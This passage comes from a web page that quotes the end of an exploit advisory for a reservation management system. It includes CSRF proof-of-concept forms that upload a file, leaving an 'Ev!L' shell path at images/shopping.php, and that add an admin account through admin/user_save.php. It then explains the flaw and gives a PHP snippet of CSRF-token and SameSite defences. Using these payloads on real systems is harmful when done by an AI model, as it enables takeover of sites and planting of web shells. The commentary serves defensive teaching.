name="price" id="title" placeholder="Price" required=""><br /> </div><br /> </div> <br /> <!-- Title --><br /> <div class="form-group"><br /> <label class="control-label col-lg-2" for="title">Image</label><br /> <div class="col-lg-8"> <br /> <input type="file" class="form-control" name="image" id="title"><br /> </div><br /> </div> <br /><br /> <!-- Buttons --><br /> <div class="form-group"><br /> <!-- Buttons --><br /> <div class="col-lg-offset-2 col-lg-6"><br /> <button type="submit" class="btn btn-sm btn-primary">Save</button><br /> <button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button><br /> </div><br /> </div><br /> </form><br /> <!--end form--><br /> </div><br /> <br /> </div><br /> <br />[+] Ev!L : http://127.0.0.1/reservation/images/shopping.php<br /><br />-----------[+] Part 02 Add Admin [+]-------------------<br /><br />[+] Line 8 : set your target URL.<br /><br />[+] Save the payload as poc.html.<br /><br />[+] payload : <br /><br /><div class="modal-content"><br /> <div class="modal-header"><br /> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button><br /> <h4 class="modal-title">Add New User</h4><br /> </div><br /> <div class="modal-body"><br /> <!--start form--><br /> <form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/user_save.php"><br /> <!-- Title --><br /> <div class="form-group"><br /> <label class="control-label col-lg-2" for="title">Full Name</label><br /> <div class="col-lg-8"> <br /> <input type="text" class="form-control" name="name" id="title" placeholder="Write Full Name of User" required=""><br /> </div><br /> </div> <br /> <!-- Title --><br /> <div class="form-group"><br /> <label class="control-label col-lg-2" for="username">Username</label><br /> <div class="col-lg-8"> <br /> <input type="text" class="form-control" name="username" value="chimney_admin" placeholder="Write Username" required=""><br /> </div><br /> </div> <br /> <!-- Title --><br /> <div class="form-group"><br /> <label class="control-label col-lg-2" for="password">Password</label><br /> <div class="col-lg-8"> <br /> <input type="password" class="form-control" name="password" id="password" placeholder="Write password" required=""><br /> </div><br /> </div> <br /> <br /> <!-- Buttons --><br /> <div class="form-group"><br /> <!-- Buttons --><br /> <div class="col-lg-offset-2 col-lg-6"><br /> <button type="submit" class="btn btn-sm btn-primary">Save</button><br /> <button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button><br /> </div><br /> </div><br /> </form><br /> <!--end form--><br /> </div><br /> <br /> </div><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
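<p>Both halves of the Reservation Management System PoC work because <code>admin/menu_save.php</code> and <code>admin/user_save.php</code> accept any POST that arrives with the admin's session cookie, regardless of which page sent it. The snippet below is an added example for this page, not the vendor's code: a per-session CSRF token checked with <code>hash_equals()</code>, cookies issued with <code>SameSite=Lax</code> so a browser will not attach them to a cross-site form submission in the first place, and an authentication check before either runs. The session key <code>admin_id</code> and the form field names are assumptions chosen for illustration.</p>

```php
<?php
// Added example (not the vendor's code): CSRF protection for state-changing admin
// handlers such as menu_save.php and user_save.php in the advisory above.
// Assumed for illustration: an admin session stores its user id in $_SESSION['admin_id'].
declare(strict_types=1);

session_start([
    'cookie_httponly' => true,
    'cookie_samesite' => 'Lax',   // browsers omit the cookie on cross-site POSTs such as poc.html
    'cookie_secure'   => isset($_SERVER['HTTPS']),
]);

/** One random token per session, created on first use and reused by every form in it. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'];
}

/** Hidden field to place inside every <form method="post">. */
function csrf_field(): string
{
    return '<input type="hidden" name="csrf" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

/**
 * Reject the request unless the submitted token matches the session's token.
 * hash_equals() compares in constant time and never type-juggles; Sec-Fetch-Site,
 * when the browser sends it, is a second, independent cross-site signal.
 */
function csrf_check(): void
{
    $sent = $_POST['csrf'] ?? '';
    if (!is_string($sent) || !hash_equals(csrf_token(), $sent)) {
        http_response_code(403);
        exit('CSRF token mismatch');
    }
    $site = $_SERVER['HTTP_SEC_FETCH_SITE'] ?? null;
    if ($site !== null && $site !== 'same-origin' && $site !== 'none') {
        http_response_code(403);
        exit('cross-site request refused');
    }
}

// --- at the top of menu_save.php / user_save.php (assumed handlers) ---
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (empty($_SESSION['admin_id'])) {   // the PoC also relies on an already logged-in admin
        http_response_code(401);
        exit('login required');
    }
    csrf_check();
    // only now touch the database or move the uploaded image
    exit('saved');
}

// --- in the page that renders the form ---
?>
<form method="post" action="user_save.php">
  <?= csrf_field() ?>
  <input type="text" name="username">
  <input type="password" name="password">
  <button type="submit">Save</button>
</form>
```

<p>The token check is the primary control; <code>SameSite=Lax</code> is defence in depth, since it does not cover top-level GET navigations and older clients ignore it. Keep the check before any side effect in the handler, including <code>move_uploaded_file()</code>, otherwise the <code>images/shopping.php</code> upload in Part 01 still lands on disk before the request is refused.</p>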